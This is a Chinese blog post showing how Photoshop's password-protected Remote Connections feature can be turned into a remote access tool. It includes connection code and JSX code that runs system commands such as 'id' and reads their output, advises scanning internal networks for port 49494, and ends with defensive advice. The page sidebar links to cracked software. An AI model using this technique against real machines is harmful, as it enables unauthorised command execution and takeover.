统计
  • 建站日期:2021-03-10
  • 文章总数:687 篇
  • 评论总数:725 条
  • 分类总数:10 个
  • 最后更新:12月1日
文章 值得一看

如何把Photoshop改造成远程控制工具(RAT)来利用

程序员阿鑫
首页 值得一看 正文


如何把Photoshop改造成远程控制工具(RAT)来利用
-程序员阿鑫-带你一起秃头!
-第1
张图片

作者在本文中通过对Photoshop远程连接功能的改造利用,最终实现了对开启远程连接功能的Photoshop端操作系统的接管控制。

Photoshop远程连接功能说明

Photoshop中有一个名为远程连接(Remote Connections)的可选功能,该功能默认是关闭的,但如果你启用该功能并设置密码后,任何知晓密码的人就可以远程接入到你电脑的Photoshop服务端。如下开启画面:


如何把Photoshop改造成远程控制工具(RAT)来利用
-程序员阿鑫-带你一起秃头!
-第2
张图片

正常用户利用该功能,来实时预览不同PS文件在iPad或手机等远程设备上的实际设计外观样式,该远程预览功能需要手机等移动终端安装如PS Playon和Skala Preview等第三方APP来实现连接。如Skala Preview:


如何把Photoshop改造成远程控制工具(RAT)来利用
-程序员阿鑫-带你一起秃头!
-第3
张图片

该远程连接功能基于Photoshop的JSX脚本实例。JSX属Photoshop的宏脚本,由Java语言编写,以实现Photoshop的图片加载、颜色渲染、矢量绘制和导出等功能,可点此查看JSX的相关编写规范和可用接口。

另外,Adobe提供了一个开源库内核生成器来建立该远程连接,所以如果您对其中的协议细节有兴趣,也可点此查看。当开启远程连接后,Photoshop将会对49494端口进行监听:

$ netstat -an | grep 49494tcp4 0 0 *.49494 *.* LISTEN

以下代码为与远程Photoshop服务端用来进行身份验证交互的代码:

const core = require("generator-core/lib/generator")const options = { host: '192.168.1.123', password: 'password', port: 49494}const generator = core.createGenerator()generator.start(options).done(() => { generator.evaluateJSXString('alert("Hello")').then(() => generator.shutdown())})

对此,我曾尝试利用以下app.system方法来调用系统命令:

alert(app.system(“id”))

但遗憾的是其返回值却是一些退出状态码,不是标准的命令输出内容。经过研究,我发现Photoshop的JSX脚本具备系统访问接口,所以,这样一来,我们可以把其标准输出内容(stdout)重定向到一个临时文件中,之后,就可以对该文件进行读取。如下所示:

var tmpFile = Folder.temp + 'output.txt';app.system("id > " + tmpFile);var stdout = new File(${tmpFile});stdout.open('r');stdout.encoding = "UTF-8";var content = stdout.read();stdout.close();stdout.remove();alert(content);


如何把Photoshop改造成远程控制工具(RAT)来利用
-程序员阿鑫-带你一起秃头!
-第4
张图片

Photoshop RAT 改造成型

因此,我可以在上述身份验证代码中作出如下修改,通过用户名密码方式登录远程Photoshop服务端,之后,再利用JSX脚本接口间接执行Photoshop服务端系统命令,实现对远程Photoshop服务端系统的直接接管控制。以下为exploit代码:

exploit.js:


如何把Photoshop改造成远程控制工具(RAT)来利用
-程序员阿鑫-带你一起秃头!
-第5
张图片

成功利用后,读取远程Photoshop服务端操作系统密码:


如何把Photoshop改造成远程控制工具(RAT)来利用
-程序员阿鑫-带你一起秃头!
-第6
张图片

影响分析

在内网中,你可以通过49494端口扫描或组播DNS”_photoshopserver.tcp”抓包来探测一些开启远程连接功能的Photoshop服务端,之后利用以上exploit.js进行把玩。


如何把Photoshop改造成远程控制工具(RAT)来利用
-程序员阿鑫-带你一起秃头!
-第7
张图片

该功能的此种RAT方式利用,前提必须知晓对方Photoshop服务远程连接密码,因此并不属于漏洞范畴。基于此,请谨慎开启你的Photoshop远程连接功能,或严格保存你的Photoshop远程连接密码,否则,你的操作系统有可能被不怀好意之人远程控制。

 

版权说明
文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!

-- 展开阅读全文 --
这篇文章最后更新于2020-6-1,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
Adobe2020CC全家桶免授权版
« 上一篇
分身有术Pro_v3.11.0高级版
下一篇 »
为了防止灌水评论,登录后即可评论!
注册登录

HI ! 请登录
注册会员,享受下载全站资源特权。
登陆 注册
上号,带你一起秃头!

IP地址

热门文章

1
抖音无限礼物模拟小工具分享
2
QQ假红包引流QQ群教程及代码
4
卡QQ永久大会员方法

最新文章

标签